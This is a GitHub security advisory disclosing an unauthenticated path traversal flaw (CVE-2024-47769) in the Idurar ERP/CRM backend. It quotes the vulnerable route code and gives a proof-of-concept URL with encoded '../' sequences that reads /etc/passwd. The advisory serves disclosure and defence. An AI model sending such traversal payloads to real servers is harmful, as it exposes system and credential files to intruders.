Skip to content

Path Traversal (unauthenticated user can read sensitive data)

High
salahlalami published GHSA-948g-2vm7-mfv7 Oct 4, 2024

Package

No package listed

Affected versions

<2.1.0

Patched versions

None

Description

Summary

Greetings team, me and Nishant discovered a path traversal issue on the Idurar-erp-crm.
Reference link to the security bug class: https://owasp.org/www-community/attacks/Path_Traversal

Details

The vulnerability exists in the corePublicRouter.js file.
Using the reference usage here, it is identified that the public endpoint is accessible to an unauthenticated user.

idurar-erp-crm/backend/src/app.js

Line 43 in d7b2215

app.use('/public', corePublicRouter);

The user's input is directly appended to the join statement without additional checks on line 13. This allows an attacker to send URL encoded malicious payload.

idurar-erp-crm/backend/src/routes/coreRoutes/corePublicRouter.js

Lines 8 to 22 in d7b2215

router.route('/:subPath/:directory/:file').get(function (req, res) {
try {
const { subPath, directory, file } = req.params;
const options = {
root: path.join(__dirname, `../../public/${subPath}/${directory}`),
};
const fileName = file;
return res.sendFile(fileName, options, function (error) {
if (error) {
return res.status(404).json({
success: false,
result: null,
message: 'we could not find : ' + file,
});

The directory structure can be escaped to read system files by adding an encoded string (payload) at subpath location /public/inject-here/:directory/:file

PoC

Deploy the application with docker using the following commands:

git clone https://github.com/idurar/idurar-erp-crm.git
cd idurar-erp-crm
docker-compose up -d

Visit the URL given below:

http://localhost:8888/public/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd

The following screenshot represents that the etc/passwd file is readable by an unauthenticated user.
poc

Impact

Unauthenticated user can read any critical file on the server.

Mitigation

Sanitize the unauthenticated user input. Use path.normalize to fix the issue. https://nodejs.org/api/path.html#path_path_normalize_path

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2024-47769

Weaknesses

Credits